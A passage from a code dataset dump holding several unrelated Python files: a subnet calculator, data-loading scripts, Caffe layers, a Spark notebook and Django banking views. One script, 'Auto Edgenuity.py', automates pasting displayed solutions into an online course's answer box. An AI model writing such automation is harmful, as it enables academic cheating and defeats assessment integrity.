codecs, then write fundamental database.\n input_user_db = []\n\n net_mask_array = return_mask_normalized(input_mask)\n net_cidr = return_cidr_normalized(input_mask)\n input_user_db.append(n_nets)\n input_user_db.append([int(i) for i in input_network.split('.')])\n input_user_db.append(net_mask_array)\n input_user_db.append(net_cidr)\n return input_user_db\n\n\ndef init_input(): # Recieve user input and validate\n input_network = input('What is the network IPv4 address: ')\n ip_code = validate_ip(input_network)\n if ip_code is None:\n pass\n else:\n print('RESTART: ERROR CODE: {}'.format(ip_code))\n main()\n return input_network\n\n\ndef mask_input(input_net): # Recieve user input for mask & Network data. Validate.\n input_labels_db = []\n# Mask input\n input_mask = input('What is the mask (255.255.255.192) or CIDR (/24): ')\n n_nets = int(input('Number of subnets required: '))\n input_user_db = pre_process(input_net, input_mask, n_nets)\n for b in range(0, n_nets):\n# Network input\n name_sub_net = input('Network ' + str(b) + ' Common Name: ')\n try:\n n_hosts = int(input('Number of hosts required: '))\n if n_hosts <= int(4): # Math doesn't work for int less than 4 / Must account for net_add, sub_broad, and a minimum of two hosts within network.\n print('INPUT UPDATE: Minimum host is 4. Must account for net_add, sub_broad, and a minimum of two hosts within network.')\n n_hosts = int(4)\n new_entry = [name_sub_net, n_hosts]\n input_labels_db.append(new_entry)\n input_labels_db = sorted(input_labels_db, key=lambda x: x[1], reverse=True)\n except:\n print('INPUT IGNORE: Value must be an integer.') # Data validation is go/no-go for integer\n name_sub_net = str('IGNORED SUBNET')\n n_hosts = int(4)\n new_entry = [name_sub_net, n_hosts]\n input_labels_db.append(new_entry)\n input_labels_db = sorted(input_labels_db, key=lambda x: x[1], reverse=True)\n pass\n return input_user_db, input_labels_db\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"design/powershell/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"29088598","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/10 下午5:15\n# @Author : Aries\n# @Site :\n# @File : word2vec.py\n# @Software: PyCharm\nfrom gensim.models import KeyedVectors\nimport numpy as np\n\n\ndef main():\n\tpath = '/Users/houruixiang/python/data/Tencent_AILab_ChineseEmbedding/Tencent_AILab_ChineseEmbedding.txt'\n\t# 加载腾讯AILab词向量\n\tword2vec_text = KeyedVectors.load_word2vec_format(path, binary=False)\n\t# np.save('./models/word2vec.npy', word2vec_text)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"406976942","text":"import csv\nimport os\nimport pandas as pd\nimport numpy as np\n\n\n# 获取当前目录下的CSV文件名\nfilepaths = []\nfor info in os.listdir('E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us'):\n domain = os.path.abspath(r'E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us')\n #获取文件夹的路径\n filepath = os.path.join(domain,info) #将路径与文件名结合起来就是每个文件的完整路径\n filepaths.append(filepath)\nprint(filepaths)\n\nneeded = []\nfor path in filepaths:\n df = pd.read_csv(path,header=0,index_col=0)\n print(df['People_Hospitalized']['New York'])\n needed.append(df['People_Hospitalized']['New York'])\nprint(needed)\nneeded = pd.DataFrame(needed)\nneeded.to_csv('E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us'+'//'+'hospital.csv',index=False)\n\n\n","sub_path":"get_data_csv.py","file_name":"get_data_csv.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"332528187","text":"#!/usr/bin/evn python\n\n\nimport numpy as np\nimport caffe\nimport yaml\nfrom fast_rcnn.nms_wrapper import nms\nfrom fast_rcnn.bbox_transform import bbox_transform_inv\nfrom fast_rcnn.config import cfg\n\n\nclass PythonFilterLayer(caffe.Layer):\n\n def setup(self, bottom, top):\n try:\n self.layer_params = yaml.load(self.param_str_)\n except AttributeError:\n self.layer_params = yaml.load(self.param_str)\n except:\n raise\n self.cfg_key = 'TRAIN' if self.phase == 0 else 'TEST'\n\n def reshape(self, bottom, top):\n pass\n\n def forward(self, bottom, top):\n raise NotImplementedError\n\n def backward(self, top, propagate_down, bottom):\n pass\n\n\nclass NmsLayer(PythonFilterLayer):\n '''\n Assume the input is N x 5, where each row is of\n [x1, y1, x2, y2, score]. Output a list of indices\n indicating which posisition to keep.\n If a second bottom blob is provided, the first blob is regarded\n as deltas whereas the second is the bbox to regress to. The\n layer will perform `bbox_transform_inv` before nms.\n '''\n\n def setup(self, bottom, top):\n super(NmsLayer, self).setup(bottom, top)\n self.thresh = self.layer_params['thresh']\n\n def forward(self, bottom, top):\n # if not self.transformed:\n # keep = nms(bottom[0].data, self.thresh)\n # else:\n # raise NotImplementedError\n if len(bottom) == 1:\n keep = nms(bottom[0].data, self.thresh)\n else:\n pred_bbox = bbox_transform_inv(bottom[1].data, bottom[0].data[:, :4])\n keep = nms(np.vstack(pred_bbox, bottom[0].data[:, -1]), self.thresh)\n top[0].reshape(len(keep))\n top[0].data[...] = keep\n\n\nclass TopNLayer(PythonFilterLayer):\n '''\n Input is N x M, where one of the M columns is the scores\n for each sample. Default is the last column. Specify\n `score_column` to indicate which column should be regarded\n as scores if not the last one.\n If `reverse` is specified, take the bottom N targets instead\n of top N.\n '''\n\n def setup(self, bottom, top):\n super(TopNLayer, self).setup(bottom, top)\n self.top_N = self.layer_params.get('top_N', cfg[self.cfg_key].RPN_BATCHSIZE)\n self.score_column = int(self.layer_params.get('score_column', -1))\n self.reverse = self.layer_params.get('reverse', False)\n top[0].reshape(1)\n\n def reshape(self, bottom, top):\n pass\n\n def forward(self, bottom, top):\n top_N = min(self.top_N, bottom[0].shape[0])\n top[0].reshape(top_N)\n if len(bottom[0].shape) > 1:\n keep = np.argsort(bottom[0].data[:, self.score_column])\n else:\n keep = np.argsort(bottom[0].data)\n if not self.reverse:\n keep = keep[::-1]\n top[0].data[...] = keep[:top_N].squeeze()\n\n\nclass ThresholdLayer(PythonFilterLayer):\n '''\n Input is N x M, where one of the M columns is the socres\n that should apply thresholding for. Default is the last column.\n Specify `score_column` to indicate which column should be regarded\n as scores if not the last one.\n If `reverse` is specified as Ture, take the targets that are below\n the threshold instead of over it.\n '''\n\n def setup(self, bottom, top):\n super(ThresholdLayer, self).setup(bottom, top)\n self.thresh = self.layer_params['thresh']\n self.score_column = int(self.layer_params.get('score_column', -1))\n self.reverse = self.layer_params.get('reverse', False)\n assert self.score_column < bottom[0].shape[1]\n\n def forward(self, bottom, top):\n if not self.reverse:\n keep = np.where(bottom[0].data[:, self.score_column] > self.thresh)[0]\n else:\n keep = np.where(bottom[0].data[:, self.score_column] <= self.thresh)[0]\n top[0].reshape(keep.shape[0])\n top[0].data[...] = keep\n","sub_path":"lib/misc/filter_layer.py","file_name":"filter_layer.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"193615004","text":"# Databricks notebook source\n# MAGIC %sh wget https://raw.githubusercontent.com/erlacherDev/Blueshift-Databricks-Spark/master/Material%20de%20Apoio/Datasets/006%20-%20007/vgsales.csv\n# MAGIC mv vgsales.csv /dbfs/FileStore/vgsales.csv\n\n# COMMAND ----------\n\npath = \"FileStore/vgsales.csv\"\n\ngamesRDD = sc.textFile(path)\n\ngarbage = gamesRDD.first()\n\ngamesWithoutGarbageRDD = gamesRDD.filter(lambda x: x != garbage)\n\nheader = gamesWithoutGarbageRDD.first()\n\ngamesWithoutHeaderRDD = gamesWithoutGarbageRDD.filter(lambda x: x != header)\n\ngamesSplitedRDD = gamesWithoutHeaderRDD.map(lambda x: x.split(\"|\"))\n\n# COMMAND ----------\n\n(Name, Platform, Year, Publisher, Global_Sales) = range(5)\n\nbestGamesRDD = gamesSplitedRDD.filter(lambda x: float(x[Global_Sales]) > 5.00)\n\nbestGamesKeyByPublisherRDD = bestGamesRDD.keyBy(lambda x: x[Publisher])\n\n# COMMAND ----------\n\ncountBestGamesByPublisherRDD = bestGamesKeyByPublisherRDD.map(lambda x: (x[0], 1)).reduceByKey(lambda x,y: x+y)\n\n# COMMAND ----------\n\ncountSortedBestGamesByPublisherRDD = countBestGamesByPublisherRDD.sortBy(lambda x: float(x[1]), ascending=False)\n\n# COMMAND ----------\n\nrankedCountBestGamesByPublisher = countSortedBestGamesByPublisherRDD.zipWithIndex()\\\n.map(lambda x: (x[0][0], x[0][1], x[1]+1))\n\n# COMMAND ----------\n\nschema = \"Publisher string, Count int, Rank int\"\n\ndisplay(spark.createDataFrame(rankedCountBestGamesByPublisher, schema))\n\n# COMMAND ----------\n\ndisplay(rankedCountBestGamesByPublisher.toDF([\"Publisher\", \"Count\", \"Rank\"]))\n","sub_path":"Material de Apoio/007 - Advanced RDDs/Python - Pair RDDs.py","file_name":"Python - Pair RDDs.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"306505989","text":"import django_tables2 as tables\nfrom django_tables2.utils import A\n\nfrom . models import *\n\n\nclass UriTable(tables.Table):\n id = tables.LinkColumn()\n entity = tables.TemplateColumn(\n \"{{ record.entity }}\",\n orderable=True, verbose_name=\"related Entity\"\n )\n ent_type = tables.TemplateColumn(\n \"{{ record.entity.get_child_class }}\",\n orderable=False, verbose_name=\"Entity Type\"\n )\n\n class Meta:\n model = Uri\n sequence = ('id', 'uri')\n attrs = {\"class\": \"table table-responsive table-hover\"}\n","sub_path":"apis_core/apis_metainfo/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"171918521","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys\narg = sys.argv\nmylist = list(enumerate(arg))\nfor i in mylist:\n print(' '.join([str(item) for item in i]))\n","sub_path":"exercices/090/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"329643281","text":"from conftest import db_steps\nfrom pages.django_pages.main_page import MainPage\nfrom pages.django_pages.login_page import LoginPage\nfrom pages.django_pages.admin_page import AdminPage\nfrom time import sleep\n\n\ndef test_group_create(browser):\n group_exist = db_steps.check_if_group_exist()\n if group_exist:\n db_steps.group_delete()\n print('Group deleted')\n db_steps.group_creation()\n main_page = MainPage(browser)\n main_page.open_base_page()\n main_page.open_login_page()\n login_page = LoginPage(browser)\n login_page.login_is_present()\n sleep(1)\n login_page.login_filling()\n admin_page = AdminPage(browser)\n admin_page.admin_is_present()\n sleep(1)\n admin_page.open_groups()\n sleep(1)\n admin_page.groups_is_present()\n admin_page.find_group_in_list()\n sleep(5)\n","sub_path":"tests/db_tests/test_group_creation.py","file_name":"test_group_creation.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336057127","text":"\n# coding: utf-8\n\nimport requests\n\ndef submit(filename):\n files = {'files': open(filename, 'rb')}\n\n data = {\n # user_id is your username which can be found on the top-right corner on our website when you logged in.\n \"user_id\": \"meta_z\",\n # your team_token.\n \"team_token\": \"65355b59c393aec8e71eaa3b1cdb70a5692e8a61816a37cde79a2bed49bba644\",\n \"description\": filename.split('/')[1], # no more than 40 chars.\n \"filename\": filename, # your filename\n }\n\n url = 'https://biendata.com/competition/kdd_2018_submit/'\n\n response = requests.post(url, files=files, data=data)\n\n print(response.text)\n\nif __name__ == '__main__':\n submit('results/submit_0503.csv')\n","sub_path":"utils/api_submit.py","file_name":"api_submit.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"162968441","text":"import pyautogui as pag\nimport numpy as np\n\n\n# coord for different button placements for writing\nenter = (1097, 799)\nsolution = (805, 594)\nend_of_sol = (877, 602)\nentry_box = (809, 651)\n\n\ndef copy():\n pag.mouseDown(button='right')\n pag.sleep(0.5)\n pag.moveRel(100, 35)\n pag.mouseUp()\n\n\ndef paste():\n pag.moveTo(entry_box, duration=0.25)\n pag.sleep(0.5)\n pag.click()\n pag.mouseDown(button='right')\n pag.moveRel(50, 150)\n pag.mouseUp()\n\n\nfor x in range(15):\n pag.sleep(4.75) # 4.75 is optimal\n pag.moveTo(entry_box)\n pag.mouseDown(button='left')\n pag.moveRel(200, 100)\n pag.keyDown('delete')\n pag.keyUp('delete')\n pag.click(enter, duration=0.2)\n pag.moveTo(solution, duration=1)\n pag.mouseDown(button='left')\n pag.moveRel(10, 17)\n copy()\n paste()\n\n pag.click(enter, duration=0.25)\n\n\n\n\n# posXY = pag.position()\n# # feeds colors\n# while not (posXY[0] == 0):\n# posXY = pag.position()\n# print(posXY, pag.pixel(posXY[0], posXY[1]))\n","sub_path":"Auto Edgenuity.py","file_name":"Auto Edgenuity.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"218945687","text":"import numpy as np\nimport random\nimport mnist_loader as ml\nimport Digit_Identifier as DI\nimport matplotlib.pylab as plt\n\n\n\ntraining_data, validation_data, test_data = ml.load_data_wrapper()\n\nnetwork = DI.Neural_Network( [ 784 , 30 , 10 ] )\n\n\ne_c, e_acc, t_c, t_acc, = network.SGD( training_data, # Input training data\n 100, # Number of epochs\n 10, # Mini-batch size\n 0.1, # Eta\n lmbda = 5, # The regularisation parameter\n evaluation_data = test_data, # Use validation, test data or None\n monitor_evaluation_cost = True,\n monitor_evaluation_accuracy = True,\n monitor_training_cost = True,\n monitor_training_accuracy = True )\n# Note that the SGD function returns the evaluation_cost, evaluation_accuracy, training_cost, training_accuracy\n\nnetwork.save(\"Stored_Network\")\n\nfig = plt.figure( figsize = (5,5) )\nax_E = fig.add_subplot( 2 , 1 , 1 )\nax_C = fig.add_subplot( 2 , 1 , 2 )\n\nax_E.plot( e_acc , label = \"Evaluation Accuracy\" )\nax_E.plot( t_acc , label = \"Training Accuracy\" )\nax_E.legend()\n\nax_C.plot( e_c , label = \"Evaluation Cost\" )\nax_C.plot( t_c , label = \"Training Cost\" )\nax_C.legend()\n\nplt.show()\n\n# plt.plot(\n","sub_path":"Handwriting/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"140297832","text":"# Leetcode 102. Binary Tree Level Order Traversal\n\n# Time Complexity : O(n) where n is the number of nodes \n\n# Space Complexity : \n# BFS :: O(n) where n is the number of nodes \n# DFS :: O(H) where H is the height of the tree\n\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Approach: BFS :: Use a Q to store the current nodes being processed, at every level pop the left most\n# node from the queue and add it to the temporary array for that level. Add its child nodes to the Q.\n# After every level append the temp array to result and return the result after all the nodes are out of Q.\n# DFS :: Using the result and current level being visited, if the size and level match add a new array\n# for the level in result. Add the current node's val to the array for the corresponding level\n\n# Your code here along with comments explaining your approach\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n# BFS\nfrom collections import deque\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n result = []\n q= deque()\n q.append(root)\n \n while q:\n # temp array to collect the nodes at level\n temp = []\n \n for _ in range(len(q)):\n # At every level pop the left most in q and if it has child nodes add them to q\n node = q.popleft()\n temp.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # After every level append the level nodes to result \n result.append(temp)\n # When the q is empty return the result\n return result\n\n\n# DFS\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n result = []\n if not root:\n return result\n self.__dfs(root,0,result)\n return result\n \n def __dfs(self,node,level,result):\n # Base\n if not node:\n return\n # If the level is visited first time, add a new array to store nodes for that level\n if level == len(result):\n result.append([])\n # Add the current node's value to corresponding level array in result \n result[level].append(node.val)\n self.__dfs(node.left,level+1,result)\n self.__dfs(node.right,level+1,result)","sub_path":"BT_level_order.py","file_name":"BT_level_order.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"73058803","text":"from django.shortcuts import render,get_object_or_404\nfrom django.views import View \nimport datetime\nfrom time import time\n\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nfrom django.contrib.auth import views as auth_views\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom branchs.models import OCSSC_branch_office\nfrom .models import User,Customer,SavingType,BankingHistory,AccountNumber\nfrom loan.models import Loan_processing\nfrom .forms import (FrontLoginForm,UserCreationForm,AbstractUserCreationForm,\n\t\t\t\tUserCreationUpdateForm,CustomerForm,CustomerEditForm,SavingsTypeForm\n\t\t\t\t,TransactForm)\n\n# Login view for the front end/customer user\nclass LoginView(auth_views.LoginView):\n form_class = FrontLoginForm\n template_name = 'registration/login.html'\n\n\nclass Transact(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tform= TransactForm()\n\t\tcontext = {\"form\":form,\"customer\":customer}\n\t\ttemplate_name = \"Transact/transact.html\"\n\t\treturn render(self.request, template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tform = TransactForm(self.request.POST)\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\ttemplate_name = \"Transact/transact.html\"\n\t\tif form.is_valid():\n\t\t\tif(form.cleaned_data.get('transaction') == \"Deposit\"):\n\t\t\t\tfinal_value = float(customer.initial_deposit)+float(form.cleaned_data.get('amount'))\n\t\t\t\tprint(final_value)\n\t\t\t\tprint(\"Deposited\") \n\t\t\tif(form.cleaned_data.get('transaction') == \"Withdrow\"):\n\t\t\t\tfinal_value = float(customer.initial_deposit)-float(form.cleaned_data.get('amount'))\n\t\t\t\tprint(final_value)\n\t\t\t\tprint(\"Withdraw\")\n\t\t\ttransact =BankingHistory( customer = customer,\n\t\t\t\t\t \tinitial_value = customer.initial_deposit,\n\t\t\t\t\t \t amount = form.cleaned_data.get('amount'),\n\t\t\t\t\t \t final_value = final_value ,\n\t\t\t\t\t \t transaction = form.cleaned_data.get('transaction'),\n\t\t\t\t\t \t transation_handler = self.request.user)\n\t\t\ttransact.save()\n\t\t\tprint(\"1\")\n\t\t\tcustomer.initial_deposit = final_value\n\t\t\tprint(\"2\")\n\t\t\tcustomer.save()\n\t\t\treturn redirect(\"transaction_list\")\nclass Transaction_list(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\ttransact = BankingHistory.objects.all()\n\t\tcontext = {\"banking\":transact}\n\t\ttemplate_name = \"Transact/list.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass SavingsTypeDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tsavings = SavingType.objects.get(id=self.kwargs['id'])\n\t\tsavings.delete()\n\t\tprint(\"Deleted Savings Type\")\n\t\treturn redirect('savings')\nclass SavingsType(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tform = SavingsTypeForm()\n\t\tcontext = {\"form\":form}\n\t\ttemplate_name = \"savings/create.html\"\n\t\treturn render(self.request, template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tsavings = SavingsTypeForm(self.request.POST)\n\t\tif savings.is_valid():\n\t\t\tsavings.save()\n\t\t\treturn redirect(\"savings\")\n\t\tcontext = {\"form\":form}\n\t\ttemplate_name = \"savings/create.html\"\n\t\treturn render(self.request, template_name,context)\n\nclass SavingsTypeList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"savings\":savings}\n\t\ttemplate_name = \"savings/list.html\"\n\t\treturn render(self.request, template_name,context)\nclass CustomerList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.all()\n\t\tprint(self.request.user.username)\n\t\tcontext = {\"Customers\":customer}\n\t\ttemplate_name = \"accounts/customer_list.html\"\n\t\treturn render(self.request, template_name,context)\n\nclass CustomerDetail(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\ttry:\n\t\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\texcept Customer.DoesNotExist:\n\t\t\tcustomer = None\n\t\ttry:\n\t\t\ttest = Loan_processing.objects.get(customer=customer)\n\t\texcept Loan_processing.DoesNotExist:\n\t\t\ttest = None\n\t\tif test != None:\n\t\t\tloan = True\n\t\telse:\n\t\t\tloan = False\n\t\ttry:\n\t\t\ttransact = BankingHistory.objects.filter(customer=customer)\n\t\texcept BankingHistory.DoesNotExist:\n\t\t\ttransact = None\n\t\tcontext = {\"form\":customer,\"loan\":loan,\"banking\":transact}\n\t\ttemplate_name = \"accounts/customer_detail.html\"\n\t\treturn render(self.request,template_name,context)\nclass CustomerEdit(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"form\":customer,\"branchs\":branchs,\"savings\":savings}\n\t\ttemplate_name = \"accounts/customer_edit.html\"\n\t\treturn render(self.request,template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tform = CustomerEditForm(self.request.POST,self.request.FILES)\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tif form.is_valid():\n\t\t\tcustomer.first_name = form.cleaned_data.get('first_name')\n\t\t\tcustomer.last_name = form.cleaned_data.get('last_name')\n\t\t\tcustomer.middle_name = form.cleaned_data.get('middle_name')\n\t\t\tcustomer.phone_number = form.cleaned_data.get('phone_number')\n\t\t\tcustomer.address = form.cleaned_data.get('address')\n\t\t\tcustomer.city = form.cleaned_data.get('city')\n\t\t\tcustomer.savings_type = SavingType.objects.get(id=self.request.POST['savings_type'])\n\t\t\tcustomer.office_branch = OCSSC_branch_office.objects.get(id=self.request.POST['office_branch'])\n\t\t\tif 'document' in self.request.FILES:\n\t\t\t\tcustomer.document = self.request.FILES['document']\n\t\t\tif 'photograph' in self.request.FILES:\n\t\t\t\tcustomer.photograph = self.request.FILES['photograph']\n\t\t\tif 'identification' in self.request.FILES:\n\t\t\t\tcustomer.identification = self.request.FILES['identification']\n\t\t\tcustomer.save()\n\t\t\treturn redirect(\"customer\")\n\t\tprint(form.errors)\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"form\":customer,\"branchs\":branchs,\"savings\":savings}\n\t\ttemplate_name = \"accounts/customer_edit.html\"\n\t\treturn render(self.request,template_name,context)\n\nclass CustomerDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tcustomer.delete()\n\t\tprint(\"Deleted customer\")\n\t\treturn redirect('customer')\nclass CustomerCreate(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tCustomer = CustomerForm()\n\t\ttemplate_name = \"accounts/customer_create.html\"\n\t\tcontext = {\"form\":Customer}\n\t\treturn render(self.request,template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tcustomer = CustomerForm(self.request.POST,self.request.FILES)\n\t\tif customer.is_valid():\n\t\t\tMainCustomer = Customer(\tfirst_name = customer.cleaned_data.get('first_name'),\n\t\t\t\tmiddle_name = customer.cleaned_data.get('middle_name'),\n\t\t\t\tlast_name = customer.cleaned_data.get('last_name'),\n\t\t\t\taccount_number = customer.cleaned_data.get('account_number'),\n\t\t\t\tinitial_deposit = customer.cleaned_data.get('initial_deposit'),\n\t\t\t\tphone_number = customer.cleaned_data.get('phone_number'),\n\t\t\t\tdocument = customer.cleaned_data.get('document'),\n\t\t\t\tphotograph = customer.cleaned_data.get('photograph') ,\n\t\t\t\tidentification = customer.cleaned_data.get('identification'),\n\t\t\t\taddress = customer.cleaned_data.get('address'),\n\t\t\t\tsavings_type = customer.cleaned_data.get('savings_type'),\n\t\t\t\tcity = customer.cleaned_data.get('city'),\n\t\t\t\toffice_branch = customer.cleaned_data.get('office_branch'),\n\t\t\t\tactive = True,\n\t\t\t\tcreated_by = self.request.user )\n\t\t\tMainCustomer.save()\n\t\t\treturn redirect(\"customer\")\n\n\t\ttemplate_name = \"accounts/customer_create.html\"\n\t\tcontext = {\"form\":customer}\n\t\treturn render(self.request,template_name,context)\n\nclass AccountList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccounts = User.objects.all()\n\t\tcontext = {\"accounts\":accounts}\n\t\ttemplate_name = \"accounts/account_list.html\"\n\t\treturn render(self.request, template_name,context)\nclass AccountDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\taccount.delete()\n\t\treturn redirect(\"account\") \n\nclass AccountSuspend(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\tprint(\"--------\") \n\t\tprint(account.active)\n\t\tprint(\"--------\")\n\t\tif account.active == True:\n\t\t\taccount.active = False\n\t\t\taccount.save()\n\t\t\tprint(\"Print - 1 change\")\n\t\telse:\n\t\t\taccount.active = True\n\t\t\taccount.save()\n\t\t\tprint(\"Print - 1 change\")\n\t\treturn redirect(\"account\")\nclass AccountDetail(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\tcontext = {\"form\":account,\"detail\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass AccountEdit(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccounts=User.objects.get(id=self.kwargs['id']) \n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tposition = {('is_manager'), ( 'is_auditor'), ( 'is_customer_service'),( 'is_system_admin')}\n\t\tcontext = {\"form\":accounts,\"branchs\":branchs,\"position\":position}\n\t\ttemplate_name = \"accounts/account_edit.html\"\n\t\treturn render(self.request, template_name, context)\n\tdef post(self,*args,**kwargs):\n\t\taccounts=User.objects.get(id=self.kwargs['id'])\n\t\tform = UserCreationUpdateForm(self.request.POST,self.request.FILES)\n\t\tif form.is_valid():\n\t\t\taccounts.first_name = form.cleaned_data.get('first_name') \n\t\t\taccounts.last_name = form.cleaned_data.get('last_name')\n\t\t\taccounts.username = self.request.POST['username']\n\n\t\t\taccounts.phone_number = form.cleaned_data.get('phone_number')\n\t\t\taccounts.address = form.cleaned_data.get('address')\n\t\t\taccounts.city = form.cleaned_data.get('city')\n\n\t\t\tuser_type = self.request.POST['user_type']\t\t\t\n\t\t\taccounts.office_branch = form.cleaned_data.get('office_branch')\n\t\t\tif(user_type == \"is_manager\"):\n\t\t\t\taccounts.is_manager = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_auditor\"):\n\t\t\t\taccounts.is_auditor = True\n\t\t\t\taccounts.is_manager = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_customer_service\"):\n\t\t\t\taccounts.is_customer_service = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_manager = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_system_admin\"):\n\t\t\t\taccounts.is_system_admin = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_manager = False\n\n\t\t\tif 'qualification_document' in self.request.FILES:\n\t\t\t\taccounts.qualification_document = self.request.FILES['qualification_document']\t\t\n\t\t\tif 'photograph' in self.request.FILES:\n\t\t\t\taccounts.photograph = self.request.FILES['photograph']\n\t\t\tif 'identification' in self.request.FILES:\n\t\t\t\taccounts.identification = self.request.FILES['identification']\n\t\t\taccounts.save()\n\t\t\treturn redirect(\"account\")\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tposition = {('is_manager'), ( 'is_auditor'), ( 'is_customer_service'),( 'is_system_admin')}\n\t\tcontext = {\"form\":form,\"branchs\":branchs,\"position\":position}\n\t\ttemplate_name = \"accounts/account_edit.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass Accountnumber(LoginRequiredMixin,View):\n\tdef get_number(self):\n\t\tnum = AccountNumber.objects.get(id=1)\n\t\treturn num.accounts\n\n\tdef post_number(self):\n\t\tnum = AccountNumber.objects.get(id=1)\n\t\tnum.accounts = 1+num.accounts\n\t\tnum.save()\n\t\tprint(\"accounts is at \"+str(num.accounts))\n\t\treturn num.accounts\n\n\tdef get(self,*args,**kwargs):\n\t\tprint(\"J working\")\n\n\t\tif self.request.is_ajax():\n\t\t\tt = 